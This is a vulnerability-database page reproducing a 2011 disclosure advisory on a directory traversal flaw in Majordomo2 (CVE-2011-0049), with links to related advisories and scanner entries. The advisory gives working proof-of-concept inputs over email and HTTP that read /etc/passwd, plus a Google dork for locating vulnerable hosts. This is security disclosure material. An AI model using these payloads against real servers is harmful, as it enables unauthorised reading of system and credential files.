Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMichael BrooksPACKETSTORM:98116
HistoryFeb 02, 2011 - 12:00 a.m.

Majordomo2 20110121 Directory Traversal

2011-02-0200:00:00
Michael Brooks
packetstormsecurity.com
35

EPSS

0.881

Percentile

98.7%

JSON
`Original Advisory: https://sitewat.ch/en/Advisory/View/1  
Credit: Michael Brooks (https://sitewat.ch)  
Vulnerability: Directory Traversal  
Software: Majordomo2  
Identifier:CVE-2011-0049  
Vendor: http://www.mj2.org/  
Affected Build: 20110121 and prior  
Download:  
http://ftp.mj2.org/pub/mj2/snapshots/2011-01/majordomo-20110121.tar.gz  
Google dork:inurl:mj_wwwusr  
  
Special thanks to Dave Miller, Reed Loden and the rest of the Mozilla  
security team for handling the issue.  
  
This vulnerability is exploitable via ALL of Majordomo2's interfaces.  
*Including  
e-mail*. Send an email to majordomo's mail interface (for example:  
[email protected]) with the body of the message as follows:  
help ../../../../../../../../../../../../../etc/passwd  
  
I'll give you one guess as to the contents of the response email ;).  
  
PoC for HTTP:  
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd  
`

Related

d2 1
cve 2
seebug 1
cert 1
prion 2
exploitpack 1
cvelist 2
securityvulns 2
zdt 1
nvd 2
nuclei 1
metasploit 1
nessus 1
openvas 1
exploitdb 1
dsquare 1
packetstorm 1
nmap 1
thn 1
d2
d2
DSquare Exploit Pack: D2SEC_MAJORDOMO
2011-02-04 01:00:00
cve
cve
CVE-2011-0049
2011-02-04 01:00:07
CVE-2011-0063
2011-03-15 17:55:02
seebug
seebug
Majordomo2 - Directory Traversal (SMTP/HTTP)
2014-07-01 00:00:00
cert
cert
Majordomo 2 _list_file_get() directory traversal vulnerability
2011-02-04 00:00:00
prion
prion
Directory traversal
2011-02-04 01:00:00
Directory traversal
2011-03-15 17:55:00
exploitpack
exploitpack
Majordomo2 - SMTPHTTP Directory Traversal
2011-02-03 00:00:00
cvelist
cvelist
CVE-2011-0049
2011-02-04 00:00:00
CVE-2011-0063
2011-03-15 17:00:00
securityvulns
securityvulns
Majordomo2 directory traversal
2011-03-10 00:00:00
Majordomo2 - Directory Traversal (SMTP/HTTP)
2011-02-03 00:00:00
zdt
zdt
Majordomo2 - Directory Traversal (SMTP/HTTP)
2011-02-03 00:00:00
nvd
nvd
CVE-2011-0049
2011-02-04 01:00:07
CVE-2011-0063
2011-03-15 17:55:02
nuclei
nuclei
Majordomo2 - SMTP/HTTP Directory Traversal
2021-04-18 10:16:06
metasploit
metasploit
Majordomo2 _list_file_get() Directory Traversal
2011-03-12 16:38:51
nessus
nessus
Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access
2011-02-16 00:00:00
openvas
openvas
Majordomo2 Directory Traversal Vulnerability
2011-02-07 00:00:00
exploitdb
exploitdb
Majordomo2 - 'SMTP/HTTP' Directory Traversal
2011-02-03 00:00:00
dsquare
dsquare
Majordomo 2 File Disclosure
2012-04-27 00:00:00
packetstorm
packetstorm
Majordomo2 _list_file_get() Directory Traversal
2024-09-01 00:00:00
nmap
nmap
http-majordomo2-dir-traversal NSE Script
2011-06-27 20:22:25
thn
thn
Nmap 5.59 BETA1 - 40 new NSE scripts & improved IPv6
2011-07-01 11:41:00

EPSS

0.881

Percentile

98.7%

JSON
Related for PACKETSTORM:98116
d21cve2seebug1cert1prion2exploitpack1cvelist2securityvulns2zdt1nvd2nuclei1metasploit1nessus1openvas1exploitdb1dsquare1packetstorm1nmap1thn1